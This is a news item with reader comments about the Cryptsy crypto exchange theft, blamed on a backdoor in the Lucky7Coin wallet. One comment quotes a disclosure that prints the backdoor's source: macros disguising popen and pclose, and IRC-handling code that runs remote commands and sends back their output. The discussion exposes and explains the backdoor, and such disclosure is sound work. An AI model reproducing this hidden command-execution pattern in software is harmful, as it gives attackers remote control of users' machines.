Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet

An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.

No sympathy here.

Crypto currencies are like the wild wild west of monetary transactions. Unless you are doing something that requires absolute discretion, it's really not worth the risk.

Re:No sympathy here.

[SirSlud]

All of those things you mentioned are not a currency. When the stock market crashed, or the dot com bubble crashed, or the "global financial meltdown" happened, did the 10 dollars in your pocket turn into 2 dollars?

HA HA

[NotQuiteReal]

(voice of Nelson)

Re:HA HA

[murdocj]

was it teleported out via a backdoor in the broker software? Or do you still own those shares and will the value come back as the market rises?

Found a Trojan in the wallet?

[DesertNomad]

Must be a slow news day...

Summary is a lot of spin also...

[thesupraman]

Well, as the current Litecoin value is around $3, I dont think you can exactly blame that for dropping it from $9.50... Especially as this was 6 months ago.
The $9.50 spike that lasted a couple of days was highly unusual, and even then the $9.50 value was only ever sellers wet dreams, $8 was more like, and the spike lasted days, and never got down to $2. Any more BS we want to throw into the summary?

Over and over

[JustAnotherOldGuy]

This is going to happen over and over and over and over and over. It'll be a looooooooong time, if ever, before virtual currencies are protected in any meaningful way against this sort of thing.

Look at it this way: there are maybe a half-dozen people running a something-coin exchange, but there are essentially a limitless number of bad guys out there who, from the safety of their basements, can spend all the time in the world thinking up ways to crack your system. Sooner or later one of them s going to do it, and *boom*, away go the something-coins. And that's assuming that the something-coin exchange guys aren't themselves in on it or playing along. Or "go bad" later. Or get extorted, or find themselves in a jam and need some money ASAP. The attack surface is, in a word, enormous.

Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.

I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies. All of the people who lost money in this will, in all likelihood, never get a dime back. And worse yet, even the people who didn't lose money directly still take a hit when the currency undergoes devaluation because of the robbery. It seems like there are a LOT of risks and not many rewards.

I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...

Re:Huh?

[gstoddart]

It's been bad security for months.

Why people expect a robust, mature, and functioning degree of security in something which is brand new, and essentially the wild west is beyond me.

How many huge bitcoin thefts have there been? And just why would we think something which has value isn't going to be the target of theft?

These are lessons the banking industry has learned over decades, and taken steps to prevent.

But suddenly someone invents crypto currency and they act all surprise to get ripped off ... and then they all stand around wondering why the magical unicorns which were supposed to make these things perfect don't really exist.

Why the fuck do people keep believing that some wallet or exchange which came into existence a few months ago is secure? There's no regulations, and not nearly enough history of having to get it right to have any faith in that.

This is "unexpected" in no way that I can tell. In fact, it's entirely what people have predicted.

Whatever. Let's stop pretending this is surprising to anybody. These are inherent flaws in the platform, and pretending otherwise is just sad.

known for months

[Gravis+Zero]

https://github.com/alerj78/luc...

dooglus commented on Mar 8, 2015

There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c /**
  * OS-dependent memory page locking/unlocking.
  * Defined as policy class to make stubbing for test possible.
  */
#define CLine S_ORDER(I,F,E,L) /**
  * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
  * std::allocator templates.
  */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os) // // Allocator that locks its contents from being paged // out of memory and clears its contents before deletion. //
#define CBuff "PR" "IV" "M" "SG"

Then in irc.cpp they are used to implement the backdoor:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }

I expect this is a known issue since this kind of thing doesn't happen accidentally.

Re:known for months

[Razed+By+TV]

Theft happened July 29, 2014, way before that post.

Re: known for months

Irc was one of the initial means of peer discovery. It has been long since replaced with better mechanisms

The Developer of Lucky7Coin...

[Fnord666]

It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was a social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new github repo for it. As part of the initial commit though they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.